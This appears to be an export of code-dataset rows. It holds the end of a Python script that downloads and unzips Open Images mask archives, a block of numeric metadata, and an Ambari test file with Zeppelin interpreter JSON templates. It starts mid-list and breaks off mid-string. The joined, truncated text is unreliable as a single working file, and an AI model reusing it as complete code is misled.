"https://storage.googleapis.com/openimages/v5/train-masks/train-masks-9.zip",
"https://storage.googleapis.com/openimages/v5/train-masks/train-masks-a.zip",
"https://storage.googleapis.com/openimages/v5/train-masks/train-masks-b.zip",
"https://storage.googleapis.com/openimages/v5/train-masks/train-masks-c.zip",
"https://storage.googleapis.com/openimages/v5/train-masks/train-masks-d.zip",
"https://storage.googleapis.com/openimages/v5/train-masks/train-masks-e.zip",
"https://storage.googleapis.com/openimages/v5/train-masks/train-masks-f.zip",
"https://storage.googleapis.com/openimages/v5/validation-masks/validation-masks-0.zip",
"https://storage.googleapis.com/openimages/v5/validation-masks/validation-masks-1.zip",
"https://storage.googleapis.com/openimages/v5/validation-masks/validation-masks-2.zip",
"https://storage.googleapis.com/openimages/v5/validation-masks/validation-masks-3.zip",
"https://storage.googleapis.com/openimages/v5/validation-masks/validation-masks-4.zip",
"https://storage.googleapis.com/openimages/v5/validation-masks/validation-masks-5.zip",
"https://storage.googleapis.com/openimages/v5/validation-masks/validation-masks-6.zip",
"https://storage.googleapis.com/openimages/v5/validation-masks/validation-masks-7.zip",
"https://storage.googleapis.com/openimages/v5/validation-masks/validation-masks-8.zip",
"https://storage.googleapis.com/openimages/v5/validation-masks/validation-masks-9.zip",
"https://storage.googleapis.com/openimages/v5/validation-masks/validation-masks-a.zip",
"https://storage.googleapis.com/openimages/v5/validation-masks/validation-masks-b.zip",
"https://storage.googleapis.com/openimages/v5/validation-masks/validation-masks-c.zip",
"https://storage.googleapis.com/openimages/v5/validation-masks/validation-masks-d.zip",
"https://storage.googleapis.com/openimages/v5/validation-masks/validation-masks-e.zip",
"https://storage.googleapis.com/openimages/v5/validation-masks/validation-masks-f.zip",
"https://storage.googleapis.com/openimages/v5/test-masks/test-masks-0.zip",
"https://storage.googleapis.com/openimages/v5/test-masks/test-masks-1.zip",
"https://storage.googleapis.com/openimages/v5/test-masks/test-masks-2.zip",
"https://storage.googleapis.com/openimages/v5/test-masks/test-masks-3.zip",
"https://storage.googleapis.com/openimages/v5/test-masks/test-masks-4.zip",
"https://storage.googleapis.com/openimages/v5/test-masks/test-masks-5.zip",
"https://storage.googleapis.com/openimages/v5/test-masks/test-masks-6.zip",
"https://storage.googleapis.com/openimages/v5/test-masks/test-masks-7.zip",
"https://storage.googleapis.com/openimages/v5/test-masks/test-masks-8.zip",
"https://storage.googleapis.com/openimages/v5/test-masks/test-masks-9.zip",
"https://storage.googleapis.com/openimages/v5/test-masks/test-masks-a.zip",
"https://storage.googleapis.com/openimages/v5/test-masks/test-masks-b.zip",
"https://storage.googleapis.com/openimages/v5/test-masks/test-masks-c.zip",
"https://storage.googleapis.com/openimages/v5/test-masks/test-masks-d.zip",
"https://storage.googleapis.com/openimages/v5/test-masks/test-masks-e.zip",
"https://storage.googleapis.com/openimages/v5/test-masks/test-masks-f.zip")
for url in urls:
try:
split = os.path.split(url)
filename = split[1]
filepath = os.path.join(download_dir, filename)
response = requests.get(url, stream=True, timeout=(3, 10))
file = open(filepath, "wb")
response.raw.decode_content = True
shutil.copyfileobj(response.raw, file)
except Exception as e:
print("Unable to download zip file.")
print(e)
continue
try:
split = os.path.splitext(filename)
dir_name = os.path.join(download_dir, split[0])
with ZipFile(filepath, 'r') as unzip_dir:
unzip_dir.extractall(dir_name)
except Exception as e:
print("Unable to unzip file.")
print(e)
continue
try:
os.remove(filepath)
except Exception as e:
print("Unable to delete zip file.")
print(e)
continue
| 59.426966
| 95
| 0.698431
| 709
| 5,289
| 5.197461
| 0.108604
| 0.156309
| 0.286567
| 0.325645
| 0.882768
| 0.85346
| 0.85346
| 0.828223
| 0.828223
| 0.815468
| 0
| 0.01817
| 0.136321
| 5,289
| 88
| 96
| 60.102273
| 0.788529
| 0
| 0
| 0.148148
| 0
| 0.592593
| 0.715258
| 0.004727
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.049383
| 0
| 0.049383
| 0.074074
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
b90f6c7146a94bc400065daf31a83dca7975e93b
| 44,237
|
py
|
Python
|
ambari-server/src/test/python/stacks/2.6/ZEPPELIN/interpreter_json_generated.py
|
zyclove/ambari
|
1032f0f54cb7b312b9a3b37570cd840f4e1e89d4
|
[
"Apache-2.0"
] | null | null | null |
ambari-server/src/test/python/stacks/2.6/ZEPPELIN/interpreter_json_generated.py
|
zyclove/ambari
|
1032f0f54cb7b312b9a3b37570cd840f4e1e89d4
|
[
"Apache-2.0"
] | null | null | null |
ambari-server/src/test/python/stacks/2.6/ZEPPELIN/interpreter_json_generated.py
|
zyclove/ambari
|
1032f0f54cb7b312b9a3b37570cd840f4e1e89d4
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python2
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
template = '\n{\n "interpreterSettings": {\n "2CKEKWY8Z": {\n "id": "2CKEKWY8Z",\n "name": "angular",\n "group": "angular",\n "properties": {},\n "status": "READY",\n "interpreterGroup": [\n {\n "name": "angular",\n "class": "org.apache.zeppelin.angular.AngularInterpreter",\n "defaultInterpreter": false,\n "editor": {\n "editOnDblClick": true\n }\n }\n ],\n "dependencies": [],\n "option": {\n "remote": true,\n "port": -1,\n "perNote": "shared",\n "perUser": "shared",\n "isExistingProcess": false,\n "setPermission": false,\n "users": [],\n "isUserImpersonate": false\n }\n },\n "2CKX8WPU1": {\n "id": "2CKX8WPU1",\n "name": "spark",\n "group": "spark",\n "properties": {\n "spark.executor.memory": "512m",\n "args": "",\n "zeppelin.spark.printREPLOutput": "true",\n "spark.cores.max": "",\n "zeppelin.dep.additionalRemoteRepository": "spark-packages,http://dl.bintray.com/spark-packages/maven,false;",\n "zeppelin.spark.sql.stacktrace": "false",\n "zeppelin.spark.importImplicit": "true",\n "zeppelin.spark.concurrentSQL": "false",\n "zeppelin.spark.useHiveContext": "true",\n "zeppelin.pyspark.python": "python",\n "zeppelin.dep.localrepo": "local-repo",\n "zeppelin.R.knitr": "true",\n "zeppelin.spark.maxResult": "1000",\n "master": "yarn-client",\n "spark.app.name": "Zeppelin",\n "zeppelin.R.image.width": "100%",\n "zeppelin.R.render.options": "out.format \\u003d \\u0027html\\u0027, comment \\u003d NA, echo \\u003d FALSE, results \\u003d \\u0027asis\\u0027, message \\u003d F, warning \\u003d F",\n "zeppelin.R.cmd": "R"\n },\n "status": "READY",\n "interpreterGroup": [\n {\n "name": "spark",\n "class": "org.apache.zeppelin.spark.SparkInterpreter",\n "defaultInterpreter": true,\n "editor": {\n "language": "scala"\n }\n },\n {\n "name": "sql",\n "class": "org.apache.zeppelin.spark.SparkSqlInterpreter",\n "defaultInterpreter": false,\n "editor": {\n "language": "sql"\n }\n },\n {\n "name": "dep",\n "class": "org.apache.zeppelin.spark.DepInterpreter",\n "defaultInterpreter": false,\n "editor": {\n "language": "scala"\n }\n },\n {\n "name": "pyspark",\n "class": "org.apache.zeppelin.spark.PySparkInterpreter",\n "defaultInterpreter": false,\n "editor": {\n "language": "python"\n }\n },\n {\n "name": "r",\n "class": "org.apache.zeppelin.spark.SparkRInterpreter",\n "defaultInterpreter": false,\n "editor": {\n "language": "r"\n }\n }\n ],\n "dependencies": [],\n "option": {\n "remote": true,\n "port": -1,\n "perNote": "shared",\n "perUser": "shared",\n "isExistingProcess": false,\n "setPermission": false,\n "users": [],\n "isUserImpersonate": false\n }\n },\n "2CK8A9MEG": {\n "id": "2CK8A9MEG",\n "name": "jdbc",\n "group": "jdbc",\n "properties": {\n "default.password": "",\n "zeppelin.jdbc.auth.type": "",\n "common.max_count": "1000",\n "zeppelin.jdbc.principal": "",\n "default.user": "gpadmin",\n "default.url": "jdbc:postgresql://localhost:5432/",\n "default.driver": "org.postgresql.Driver",\n "zeppelin.jdbc.keytab.location": "",\n "zeppelin.jdbc.concurrent.use": "true",\n "zeppelin.jdbc.concurrent.max_connection": "10"\n },\n "status": "READY",\n "interpreterGroup": [\n {\n "name": "sql",\n "class": "org.apache.zeppelin.jdbc.JDBCInterpreter",\n "defaultInterpreter": false,\n "editor": {\n "language": "sql",\n "editOnDblClick": false\n }\n }\n ],\n "dependencies": [],\n "option": {\n "remote": true,\n "port": -1,\n "perNote": "shared",\n "perUser": "shared",\n "isExistingProcess": false,\n "setPermission": false,\n "users": [],\n "isUserImpersonate": false\n }\n },\n "2CKX6DGQZ": {\n "id": "2CKX6DGQZ",\n "name": "livy",\n "group": "livy",\n "properties": {\n "zeppelin.livy.pull_status.interval.millis": "1000",\n "livy.spark.executor.memory": "",\n "zeppelin.livy.session.create_timeout": "120",\n "zeppelin.livy.principal": "",\n "zeppelin.livy.spark.sql.maxResult": "1000",\n "zeppelin.livy.keytab": "",\n "zeppelin.livy.concurrentSQL": "false",\n "zeppelin.livy.spark.sql.field.truncate": "true",\n "livy.spark.executor.cores": "",\n "zeppelin.livy.displayAppInfo": "false",\n "zeppelin.livy.url": "http://localhost:8998",\n "livy.spark.dynamicAllocation.minExecutors": "",\n "livy.spark.driver.cores": "",\n "livy.spark.jars.packages": "",\n "livy.spark.dynamicAllocation.enabled": "",\n "livy.spark.executor.instances": "",\n "livy.spark.dynamicAllocation.cachedExecutorIdleTimeout": "",\n "livy.spark.dynamicAllocation.maxExecutors": "",\n "livy.spark.dynamicAllocation.initialExecutors": "",\n "livy.spark.driver.memory": ""\n },\n "status": "READY",\n "interpreterGroup": [\n {\n "name": "spark",\n "class": "org.apache.zeppelin.livy.LivySparkInterpreter",\n "defaultInterpreter": true,\n "editor": {\n "language": "scala",\n "editOnDblClick": false\n }\n },\n {\n "name": "sql",\n "class": "org.apache.zeppelin.livy.LivySparkSQLInterpreter",\n "defaultInterpreter": false,\n "editor": {\n "language": "sql",\n "editOnDblClick": false\n }\n },\n {\n "name": "pyspark",\n "class": "org.apache.zeppelin.livy.LivyPySparkInterpreter",\n "defaultInterpreter": false,\n "editor": {\n "language": "python",\n "editOnDblClick": false\n }\n },\n {\n "name": "pyspark3",\n "class": "org.apache.zeppelin.livy.LivyPySpark3Interpreter",\n "defaultInterpreter": false,\n "editor": {\n "language": "python",\n "editOnDblClick": false\n }\n },\n {\n "name": "sparkr",\n "class": "org.apache.zeppelin.livy.LivySparkRInterpreter",\n "defaultInterpreter": false,\n "editor": {\n "language": "r",\n "editOnDblClick": false\n }\n }\n ],\n "dependencies": [],\n "option": {\n "remote": true,\n "port": -1,\n "perNote": "shared",\n "perUser": "scoped",\n "isExistingProcess": false,\n "setPermission": false,\n "users": [],\n "isUserImpersonate": false\n }\n },\n "2CKAY1A8Y": {\n "id": "2CKAY1A8Y",\n "name": "md",\n "group": "md",\n "properties": {\n "markdown.parser.type": "markdown4j"\n },\n "status": "READY",\n "interpreterGroup": [\n {\n "name": "md",\n "class": "org.apache.zeppelin.markdown.Markdown",\n "defaultInterpreter": false,\n "editor": {\n "language": "markdown",\n "editOnDblClick": true\n }\n }\n ],\n "dependencies": [],\n "option": {\n "remote": true,\n "port": -1,\n "perNote": "shared",\n "perUser": "shared",\n "isExistingProcess": false,\n "setPermission": false,\n "users": [],\n "isUserImpersonate": false\n }\n },\n "2CHS8UYQQ": {\n "id": "2CHS8UYQQ",\n "name": "sh",\n "group": "sh",\n "properties": {\n "zeppelin.shell.keytab.location": "",\n "shell.command.timeout.millisecs": "60000",\n "zeppelin.shell.principal": "",\n "zeppelin.shell.auth.type": ""\n },\n "status": "READY",\n "interpreterGroup": [\n {\n "name": "sh",\n "class": "org.apache.zeppelin.shell.ShellInterpreter",\n "defaultInterpreter": false,\n "editor": {\n "language": "sh",\n "editOnDblClick": false\n }\n }\n ],\n "dependencies": [],\n "option": {\n "remote": true,\n "port": -1,\n "perNote": "shared",\n "perUser": "shared",\n "isExistingProcess": false,\n "setPermission": false,\n "users": [],\n "isUserImpersonate": false\n }\n }\n },\n "interpreterBindings": {},\n "interpreterRepositories": [\n {\n "id": "central",\n "type": "default",\n "url": "http://repo1.maven.org/maven2/",\n "releasePolicy": {\n "enabled": true,\n "updatePolicy": "daily",\n "checksumPolicy": "warn"\n },\n "snapshotPolicy": {\n "enabled": true,\n "updatePolicy": "daily",\n "checksumPolicy": "warn"\n },\n "mirroredRepositories": [],\n "repositoryManager": false\n },\n {\n "id": "local",\n "type": "default",\n "url": "file:///home/zeppelin/.m2/repository",\n "releasePolicy": {\n "enabled": true,\n "updatePolicy": "daily",\n "checksumPolicy": "warn"\n },\n "snapshotPolicy": {\n "enabled": true,\n "updatePolicy": "daily",\n "checksumPolicy": "warn"\n },\n "mirroredRepositories": [],\n "repositoryManager": false\n }\n ]\n}\n'
template_after_base = '{\n "interpreterSettings": {\n "2CHS8UYQQ": {\n "status": "READY", \n "group": "sh", \n "name": "sh", \n "id": "2CHS8UYQQ", \n "interpreterGroup": [\n {\n "editor": {\n "editOnDblClick": false, \n "language": "sh"\n }, \n "defaultInterpreter": false, \n "name": "sh", \n "class": "org.apache.zeppelin.shell.ShellInterpreter"\n }\n ], \n "dependencies": [], \n "properties": {\n "shell.command.timeout.millisecs": "60000", \n "zeppelin.shell.auth.type": "", \n "zeppelin.shell.keytab.location": "", \n "zeppelin.shell.principal": ""\n }, \n "option": {\n "setPermission": false, \n "remote": true, \n "users": [], \n "isExistingProcess": false, \n "perUser": "shared", \n "isUserImpersonate": false, \n "perNote": "shared", \n "port": -1\n }\n }, \n "2CKAY1A8Y": {\n "status": "READY", \n "group": "md", \n "name": "md", \n "id": "2CKAY1A8Y", \n "interpreterGroup": [\n {\n "editor": {\n "editOnDblClick": true, \n "language": "markdown"\n }, \n "defaultInterpreter": false, \n "name": "md", \n "class": "org.apache.zeppelin.markdown.Markdown"\n }\n ], \n "dependencies": [], \n "properties": {\n "markdown.parser.type": "markdown4j"\n }, \n "option": {\n "setPermission": false, \n "remote": true, \n "users": [], \n "isExistingProcess": false, \n "perUser": "shared", \n "isUserImpersonate": false, \n "perNote": "shared", \n "port": -1\n }\n }, \n "2CKX8WPU1": {\n "status": "READY", \n "group": "spark", \n "name": "spark", \n "id": "2CKX8WPU1", \n "interpreterGroup": [\n {\n "editor": {\n "language": "scala"\n }, \n "defaultInterpreter": true, \n "name": "spark", \n "class": "org.apache.zeppelin.spark.SparkInterpreter"\n }, \n {\n "editor": {\n "language": "sql"\n }, \n "defaultInterpreter": false, \n "name": "sql", \n "class": "org.apache.zeppelin.spark.SparkSqlInterpreter"\n }, \n {\n "editor": {\n "language": "scala"\n }, \n "defaultInterpreter": false, \n "name": "dep", \n "class": "org.apache.zeppelin.spark.DepInterpreter"\n }, \n {\n "editor": {\n "language": "python"\n }, \n "defaultInterpreter": false, \n "name": "pyspark", \n "class": "org.apache.zeppelin.spark.PySparkInterpreter"\n }, \n {\n "editor": {\n "language": "r"\n }, \n "defaultInterpreter": false, \n "name": "r", \n "class": "org.apache.zeppelin.spark.SparkRInterpreter"\n }\n ], \n "dependencies": [], \n "properties": {\n "zeppelin.dep.additionalRemoteRepository": "spark-packages,http://dl.bintray.com/spark-packages/maven,false;", \n "zeppelin.dep.localrepo": "local-repo", \n "zeppelin.spark.useHiveContext": "true", \n "zeppelin.spark.printREPLOutput": "true", \n "zeppelin.R.image.width": "100%", \n "zeppelin.spark.importImplicit": "true", \n "spark.app.name": "Zeppelin", \n "args": "", \n "zeppelin.spark.sql.stacktrace": "false", \n "zeppelin.spark.concurrentSQL": "false", \n "zeppelin.R.cmd": "R", \n "master": "yarn-client", \n "zeppelin.pyspark.python": "python", \n "zeppelin.R.knitr": "true", \n "zeppelin.R.render.options": "out.format = \'html\', comment = NA, echo = FALSE, results = \'asis\', message = F, warning = F", \n "spark.executor.memory": "512m", \n "zeppelin.spark.maxResult": "1000", \n "spark.cores.max": ""\n }, \n "option": {\n "setPermission": false, \n "remote": true, \n "users": [], \n "isExistingProcess": false, \n "perUser": "shared", \n "isUserImpersonate": false, \n "perNote": "shared", \n "port": -1\n }\n }, \n "2CK8A9MEG": {\n "status": "READY", \n "group": "jdbc", \n "name": "jdbc", \n "id": "2CK8A9MEG", \n "interpreterGroup": [\n {\n "editor": {\n "editOnDblClick": false, \n "language": "sql"\n }, \n "defaultInterpreter": false, \n "name": "sql", \n "class": "org.apache.zeppelin.jdbc.JDBCInterpreter"\n }\n ], \n "dependencies": [], \n "properties": {\n "common.max_count": "1000", \n "zeppelin.jdbc.keytab.location": "", \n "zeppelin.jdbc.concurrent.max_connection": "10", \n "default.user": "gpadmin", \n "zeppelin.jdbc.auth.type": "", \n "default.url": "jdbc:postgresql://localhost:5432/", \n "default.driver": "org.postgresql.Driver", \n "zeppelin.jdbc.concurrent.use": "true", \n "default.password": "", \n "zeppelin.jdbc.principal": ""\n }, \n "option": {\n "setPermission": false, \n "remote": true, \n "users": [], \n "isExistingProcess": false, \n "perUser": "shared", \n "isUserImpersonate": false, \n "perNote": "shared", \n "port": -1\n }\n }, \n "2C4U48MY3_spark2": {\n "status": "READY", \n "group": "spark", \n "name": "spark2", \n "id": "2C4U48MY3_spark2", \n "interpreterGroup": [\n {\n "defaultInterpreter": true, \n "name": "spark", \n "class": "org.apache.zeppelin.spark.SparkInterpreter"\n }, \n {\n "defaultInterpreter": false, \n "name": "sql", \n "class": "org.apache.zeppelin.spark.SparkSqlInterpreter"\n }, \n {\n "defaultInterpreter": false, \n "name": "dep", \n "class": "org.apache.zeppelin.spark.DepInterpreter"\n }, \n {\n "defaultInterpreter": false, \n "name": "pyspark", \n "class": "org.apache.zeppelin.spark.PySparkInterpreter"\n }, \n {\n "defaultInterpreter": false, \n "name": "r", \n "class": "org.apache.zeppelin.spark.SparkRInterpreter"\n }\n ], \n "dependencies": [], \n "properties": {\n "zeppelin.dep.additionalRemoteRepository": "spark-packages,http://dl.bintray.com/spark-packages/maven,false;", \n "zeppelin.dep.localrepo": "local-repo", \n "zeppelin.spark.useHiveContext": "true", \n "zeppelin.spark.printREPLOutput": "true", \n "zeppelin.R.image.width": "100%", \n "zeppelin.spark.importImplicit": "true", \n "spark.app.name": "Zeppelin", \n "args": "", \n "zeppelin.spark.sql.stacktrace": "false", \n "zeppelin.spark.concurrentSQL": "false", \n "zeppelin.R.cmd": "R", \n "master": "local[*]", \n "zeppelin.pyspark.python": "python", \n "zeppelin.R.knitr": "true", \n "zeppelin.R.render.options": "out.format = \'html\', comment = NA, echo = FALSE, results = \'asis\', message = F, warning = F", \n "spark.executor.memory": "", \n "zeppelin.spark.maxResult": "1000", \n "spark.cores.max": ""\n }, \n "option": {\n "setPermission": false, \n "perNoteProcess": false, \n "remote": true, \n "perNoteSession": false, \n "isExistingProcess": false, \n "port": -1\n }\n }, \n "2CKEKWY8Z": {\n "status": "READY", \n "group": "angular", \n "name": "angular", \n "id": "2CKEKWY8Z", \n "interpreterGroup": [\n {\n "editor": {\n "editOnDblClick": true\n }, \n "defaultInterpreter": false, \n "name": "angular", \n "class": "org.apache.zeppelin.angular.AngularInterpreter"\n }\n ], \n "dependencies": [], \n "properties": {}, \n "option": {\n "setPermission": false, \n "remote": true, \n "users": [], \n "isExistingProcess": false, \n "perUser": "shared", \n "isUserImpersonate": false, \n "perNote": "shared", \n "port": -1\n }\n }, \n "2C8A4SZ9T_livy2": {\n "status": "READY", \n "group": "livy", \n "name": "livy2", \n "id": "2C8A4SZ9T_livy2", \n "interpreterGroup": [\n {\n "defaultInterpreter": false, \n "class": "org.apache.zeppelin.livy.LivySparkInterpreter", \n "name": "spark", \n "editor": {\n "editOnDblClick": false, \n "language": "scala"\n }\n }, \n {\n "defaultInterpreter": false, \n "class": "org.apache.zeppelin.livy.LivySparkSQLInterpreter", \n "name": "sql", \n "editor": {\n "editOnDblClick": false, \n "language": "sql"\n }\n }, \n {\n "defaultInterpreter": false, \n "class": "org.apache.zeppelin.livy.LivyPySparkInterpreter", \n "name": "pyspark", \n "editor": {\n "editOnDblClick": false, \n "language": "python"\n }\n }, \n {\n "defaultInterpreter": false, \n "class": "org.apache.zeppelin.livy.LivyPySpark3Interpreter", \n "name": "pyspark3", \n "editor": {\n "editOnDblClick": false, \n "language": "python"\n }\n }, \n {\n "defaultInterpreter": false, \n "class": "org.apache.zeppelin.livy.LivySparkRInterpreter", \n "name": "sparkr", \n "editor": {\n "editOnDblClick": false, \n "language": "r"\n }\n }, \n {\n "defaultInterpreter": false, \n "name": "shared", \n "class": "org.apache.zeppelin.livy.LivySharedInterpreter"\n }\n ], \n "dependencies": [], \n "properties": {\n "zeppelin.livy.keytab": "", \n "zeppelin.livy.spark.sql.maxResult": "1000", \n "livy.spark.executor.instances": "", \n "livy.spark.executor.memory": "", \n "livy.spark.dynamicAllocation.enabled": "", \n "livy.spark.dynamicAllocation.cachedExecutorIdleTimeout": "", \n "livy.spark.dynamicAllocation.initialExecutors": "", \n "zeppelin.livy.principal": "", \n "zeppelin.livy.session.create_timeout": "120", \n "livy.spark.driver.memory": "", \n "livy.spark.jars.packages": "", \n "livy.spark.dynamicAllocation.maxExecutors": "", \n "zeppelin.livy.concurrentSQL": "false", \n "zeppelin.livy.displayAppInfo": "true", \n "livy.spark.dynamicAllocation.minExecutors": "", \n "zeppelin.livy.url": "http://localhost:8998", \n "zeppelin.livy.pull_status.interval.millis": "1000", \n "livy.spark.driver.cores": "", \n "livy.spark.executor.cores": ""\n }, \n "option": {\n "setPermission": false, \n "remote": true, \n "users": [], \n "isExistingProcess": false, \n "perUser": "scoped", \n "isUserImpersonate": false, \n "perNote": "shared", \n "port": -1\n }\n }, \n "2CKX6DGQZ": {\n "status": "READY", \n "group": "livy", \n "name": "livy", \n "id": "2CKX6DGQZ", \n "interpreterGroup": [\n {\n "editor": {\n "editOnDblClick": false, \n "language": "scala"\n }, \n "defaultInterpreter": true, \n "name": "spark", \n "class": "org.apache.zeppelin.livy.LivySparkInterpreter"\n }, \n {\n "editor": {\n "editOnDblClick": false, \n "language": "sql"\n }, \n "defaultInterpreter": false, \n "name": "sql", \n "class": "org.apache.zeppelin.livy.LivySparkSQLInterpreter"\n }, \n {\n "editor": {\n "editOnDblClick": false, \n "language": "python"\n }, \n "defaultInterpreter": false, \n "name": "pyspark", \n "class": "org.apache.zeppelin.livy.LivyPySparkInterpreter"\n }, \n {\n "editor": {\n "editOnDblClick": false, \n "language": "python"\n }, \n "defaultInterpreter": false, \n "name": "pyspark3", \n "class": "org.apache.zeppelin.livy.LivyPySpark3Interpreter"\n }, \n {\n "editor": {\n "editOnDblClick": false, \n "language": "r"\n }, \n "defaultInterpreter": false, \n "name": "sparkr", \n "class": "org.apache.zeppelin.livy.LivySparkRInterpreter"\n }, \n {\n "defaultInterpreter": false, \n "name": "shared", \n "class": "org.apache.zeppelin.livy.LivySharedInterpreter"\n }\n ], \n "dependencies": [], \n "properties": {\n "livy.spark.dynamicAllocation.initialExecutors": "", \n "zeppelin.livy.keytab": "", \n "zeppelin.livy.spark.sql.maxResult": "1000", \n "livy.spark.executor.instances": "", \n "livy.spark.driver.memory": "", \n "livy.spark.executor.memory": "", \n "livy.spark.dynamicAllocation.enabled": "", \n "livy.spark.dynamicAllocation.cachedExecutorIdleTimeout": "", \n "livy.spark.driver.cores": "", \n "zeppelin.livy.session.create_timeout": "120", \n "zeppelin.livy.principal": "", \n "livy.spark.jars.packages": "", \n "livy.spark.dynamicAllocation.maxExecutors": "", \n "zeppelin.livy.concurrentSQL": "false", \n "zeppelin.livy.displayAppInfo": "false", \n "livy.spark.dynamicAllocation.minExecutors": "", \n "zeppelin.livy.url": "http://localhost:8998", \n "zeppelin.livy.spark.sql.field.truncate": "true", \n "zeppelin.livy.pull_status.interval.millis": "1000", \n "livy.spark.executor.cores": ""\n }, \n "option": {\n "setPermission": false, \n "remote": true, \n "users": [], \n "isExistingProcess": false, \n "perUser": "scoped", \n "isUserImpersonate": false, \n "perNote": "shared", \n "port": -1\n }\n }\n }, \n "interpreterBindings": {}, \n "interpreterRepositories": [\n {\n "releasePolicy": {\n "checksumPolicy": "warn", \n "enabled": true, \n "updatePolicy": "daily"\n }, \n "mirroredRepositories": [], \n "snapshotPolicy": {\n "checksumPolicy": "warn", \n "enabled": true, \n "updatePolicy": "daily"\n }, \n "url": "http://repo1.maven.org/maven2/", \n "repositoryManager": false, \n "type": "default", \n "id": "central"\n }, \n {\n "releasePolicy": {\n "checksumPolicy": "warn", \n "enabled": true, \n "updatePolicy": "daily"\n }, \n "mirroredRepositories": [], \n "snapshotPolicy": {\n "checksumPolicy": "warn", \n "enabled": true, \n "updatePolicy": "daily"\n }, \n "url": "file:///home/zeppelin/.m2/repository", \n "repositoryManager": false, \n "type": "default", \n "id": "local"\n }\n ]\n}'
template_after_without_spark_and_livy = '{\n "interpreterSettings": {\n "2CHS8UYQQ": {\n "status": "READY", \n "group": "sh", \n "name": "sh", \n "id": "2CHS8UYQQ", \n "interpreterGroup": [\n {\n "editor": {\n "editOnDblClick": false, \n "language": "sh"\n }, \n "defaultInterpreter": false, \n "name": "sh", \n "class": "org.apache.zeppelin.shell.ShellInterpreter"\n }\n ], \n "dependencies": [], \n "properties": {\n "shell.command.timeout.millisecs": "60000", \n "zeppelin.shell.auth.type": "", \n "zeppelin.shell.keytab.location": "", \n "zeppelin.shell.principal": ""\n }, \n "option": {\n "setPermission": false, \n "remote": true, \n "users": [], \n "isExistingProcess": false, \n "perUser": "shared", \n "isUserImpersonate": false, \n "perNote": "shared", \n "port": -1\n }\n }, \n "2CKAY1A8Y": {\n "status": "READY", \n "group": "md", \n "name": "md", \n "id": "2CKAY1A8Y", \n "interpreterGroup": [\n {\n "editor": {\n "editOnDblClick": true, \n "language": "markdown"\n }, \n "defaultInterpreter": false, \n "name": "md", \n "class": "org.apache.zeppelin.markdown.Markdown"\n }\n ], \n "dependencies": [], \n "properties": {\n "markdown.parser.type": "markdown4j"\n }, \n "option": {\n "setPermission": false, \n "remote": true, \n "users": [], \n "isExistingProcess": false, \n "perUser": "shared", \n "isUserImpersonate": false, \n "perNote": "shared", \n "port": -1\n }\n }, \n "2CKX8WPU1": {\n "status": "READY", \n "group": "spark", \n "name": "spark", \n "id": "2CKX8WPU1", \n "interpreterGroup": [\n {\n "editor": {\n "language": "scala"\n }, \n "defaultInterpreter": true, \n "name": "spark", \n "class": "org.apache.zeppelin.spark.SparkInterpreter"\n }, \n {\n "editor": {\n "language": "sql"\n }, \n "defaultInterpreter": false, \n "name": "sql", \n "class": "org.apache.zeppelin.spark.SparkSqlInterpreter"\n }, \n {\n "editor": {\n "language": "scala"\n }, \n "defaultInterpreter": false, \n "name": "dep", \n "class": "org.apache.zeppelin.spark.DepInterpreter"\n }, \n {\n "editor": {\n "language": "python"\n }, \n "defaultInterpreter": false, \n "name": "pyspark", \n "class": "org.apache.zeppelin.spark.PySparkInterpreter"\n }, \n {\n "editor": {\n "language": "r"\n }, \n "defaultInterpreter": false, \n "name": "r", \n "class": "org.apache.zeppelin.spark.SparkRInterpreter"\n }\n ], \n "dependencies": [], \n "properties": {\n "zeppelin.dep.additionalRemoteRepository": "spark-packages,http://dl.bintray.com/spark-packages/maven,false;", \n "zeppelin.dep.localrepo": "local-repo", \n "zeppelin.spark.useHiveContext": "true", \n "zeppelin.spark.printREPLOutput": "true", \n "zeppelin.R.image.width": "100%", \n "zeppelin.spark.importImplicit": "true", \n "spark.app.name": "Zeppelin", \n "args": "", \n "zeppelin.spark.sql.stacktrace": "false", \n "zeppelin.spark.concurrentSQL": "false", \n "SPARK_HOME": "/usr/hdp/current/spark-client/", \n "zeppelin.R.cmd": "R", \n "master": "yarn-client", \n "zeppelin.pyspark.python": "python", \n "zeppelin.R.knitr": "true", \n "zeppelin.R.render.options": "out.format = \'html\', comment = NA, echo = FALSE, results = \'asis\', message = F, warning = F", \n "spark.executor.memory": "512m", \n "zeppelin.spark.maxResult": "1000", \n "spark.cores.max": ""\n }, \n "option": {\n "setPermission": false, \n "remote": true, \n "users": [], \n "isExistingProcess": false, \n "perUser": "shared", \n "isUserImpersonate": false, \n "perNote": "shared", \n "port": -1\n }\n }, \n "2CK8A9MEG": {\n "status": "READY", \n "group": "jdbc", \n "name": "jdbc", \n "id": "2CK8A9MEG", \n "interpreterGroup": [\n {\n "editor": {\n "editOnDblClick": false, \n "language": "sql"\n }, \n "defaultInterpreter": false, \n "name": "sql", \n "class": "org.apache.zeppelin.jdbc.JDBCInterpreter"\n }\n ], \n "dependencies": [], \n "properties": {\n "common.max_count": "1000", \n "zeppelin.jdbc.keytab.location": "", \n "zeppelin.jdbc.concurrent.max_connection": "10", \n "default.user": "gpadmin", \n "zeppelin.jdbc.auth.type": "", \n "default.url": "jdbc:postgresql://localhost:5432/", \n "default.driver": "org.postgresql.Driver", \n "zeppelin.jdbc.concurrent.use": "true", \n "default.password": "", \n "zeppelin.jdbc.principal": ""\n }, \n "option": {\n "setPermission": false, \n "remote": true, \n "users": [], \n "isExistingProcess": false, \n "perUser": "shared", \n "isUserImpersonate": false, \n "perNote": "shared", \n "port": -1\n }\n }, \n "2CKEKWY8Z": {\n "status": "READY", \n "group": "angular", \n "name": "angular", \n "id": "2CKEKWY8Z", \n 